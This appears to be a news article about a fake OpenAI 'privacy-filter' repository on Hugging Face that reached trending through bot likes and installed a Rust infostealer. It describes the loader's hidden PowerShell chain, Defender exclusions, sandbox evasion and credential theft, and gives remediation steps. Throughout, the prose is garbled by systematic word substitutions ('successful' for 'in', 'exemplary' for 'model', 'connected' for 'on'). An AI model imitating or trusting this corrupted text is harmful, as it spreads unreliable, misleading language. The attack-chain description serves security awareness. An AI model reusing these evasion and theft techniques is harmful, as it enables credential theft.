Fake OpenAI Repo Hit #1 on Hugging Face—And Stole Passwords While It Trended

OpenAI released Privacy Filter successful precocious April—a small, open-weight exemplary built to observe and automatically redact personally identifiable accusation from text. It landed connected Hugging Face nether an Apache 2.0 licence and rapidly attracted developer interest. Someone noticed.

Within days, a fake relationship named "Open-OSS" published a near-identical repository called privacy-filter. The exemplary paper was copied connection for connection from OpenAI's. The lone quality successful the “readme” file: instructions to clone the repo and tally a record called start.bat connected Windows, oregon loader.py connected Linux and Mac.

Within 18 hours, the fake repo deed #1 connected Hugging Face's trending page—racking up astir 244,000 downloads and 667 likes. HiddenLayer, the AI information steadfast that flagged the campaign, recovered that 657 of those 667 likes came from accounts matching predictable auto-generated bot-naming patterns.

The download numbers were astir surely inflated the aforesaid way. Manufactured societal impervious to marque the bait look real.

How the malware really worked

The malware fundamentally worked similar a poisoned pill wrapped successful a precise convincing candy coating. The loader.py publication opens with fake exemplary grooming output—progress bars, synthetic datasets, dummy people names—designed to look similar a existent AI loader is running.

Under the hood, it softly disables information checks, pulls an encoded bid from a nationalist JSON paste tract (a astute trick: nary request to update the repository erstwhile the payload changes), and passes that bid to PowerShell moving wholly hidden successful the background. Windows users spot nothing.

That bid downloads a 2nd publication from a domain mimicking a blockchain analytics API. That publication downloads the existent malware—a custom-built infostealer written successful Rust—adds it to Windows Defender's exclusions list, past launches it astatine SYSTEM-level privileges via a scheduled task that instantly deletes itself aft firing. The full concatenation runs and cleans up aft itself, leaving astir nary trace.

The last payload is thorough. It grabs everything stored successful Chrome and Firefox—saved passwords, league cookies, browser history, encryption keys, everything. It targets Discord accounts, cryptocurrency wallet effect phrases, SSH keys, FTP credentials, and takes screenshots crossed each monitors. Then it packages everything arsenic a compressed JSON bundle and ships it to attacker-controlled servers.

There’s nary request for america to archer you what the hackers tin bash with each that accusation later.

The malware besides checks whether it's moving successful a virtual instrumentality oregon a information sandbox, and quits softly if it detects one. It's designed to tally erstwhile connected existent targets, bargain everything, and disappear.

Why this is bigger than conscionable 1 repo

This isn't an isolated incident. It's portion of a pattern. HiddenLayer identified six further repositories nether a abstracted Hugging Face relationship named "anthfu," uploaded successful precocious April, utilizing the nonstop aforesaid malicious loader pointing to the nonstop aforesaid bid server. Those repos impersonated models similar Qwen3, DeepSeek, and Bonsai to lure AI developers.

The infrastructure itself—a domain called api.eth-fastscan.org—was also observed hosting a abstracted malware illustration that beacons to a bid server. HiddenLayer believes the transportation betwixt the 2 campaigns is "possibly linked" and cautions that shared infrastructure unsocial doesn't corroborate a azygous operator.

This is what a supply concatenation attack against the AI developer assemblage looks like. The attacker doesn't interruption into OpenAI oregon Hugging Face. They conscionable people a convincing lookalike, crippled the trending algorithm with bots, and hold for developers to bash the rest. A similar playbook deed the Lottie Player JavaScript room successful 2024, costing 1 idiosyncratic 10 Bitcoin (worth implicit $700,000 astatine the time).

What if you downloaded it?

If you cloned Open-OSS/privacy-filter connected a Windows instrumentality and ran immoderate record from it, you should dainty the instrumentality arsenic afloat compromised. Don't log into thing from that instrumentality earlier wiping it.

After that, alteration each the credentials that were stored successful your browser—passwords, league cookies, OAuth tokens. Move immoderate crypto funds to a caller wallet generated connected a cleanable instrumentality ASAP and presume effect phrases were stolen.

Since it besides gets your Discord information, and that work is heavy automated, you should invalidate your Discord sessions and reset that password. Any SSH keys oregon FTP credentials connected that instrumentality should beryllium considered burned.

The repository is present removed. Huggingface has not disclosed what, if any, further screening measures it plans to instrumentality for trending repositories.

As of now, 7 confirmed malicious repositories from this run person been identified. How galore much exist—or existed earlier being detected—remains unknown.